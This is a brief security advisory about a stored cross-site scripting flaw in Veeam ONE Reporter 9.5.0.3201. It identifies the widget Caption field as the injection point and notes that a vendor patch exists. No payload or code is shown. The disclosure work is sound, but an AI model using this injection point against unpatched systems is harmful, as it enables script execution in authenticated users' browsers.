Vendor: Veeam ONE Reporter
By: Seyed Sadegh Khatami
CVSS: 8.8 (HIGH)
Stored Cross-site Scripting
CWE: 79
Product Name: Veeam ONE Reporter
Affected Version From: 9.5.0.3201
Affected Version To: 9.5.0.3201
Patch Exists: YES
Related CWE: N/A
CPE: a:veeam:veeam_one_reporter:9.5.0.3201
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2016
2019
Veeam ONE Reporter – Stored Cross-site Scripting (Add/Edit Widget)
Veeam ONE Reporter is vulnerable to stored cross-site scripting. An attacker can inject malicious JavaScript code into the Caption field of the Add/Edit Widget page; the injected code is stored in the database and executed when the page is viewed by an authenticated user.
Mitigation:
The vendor has released a patch to address this vulnerability.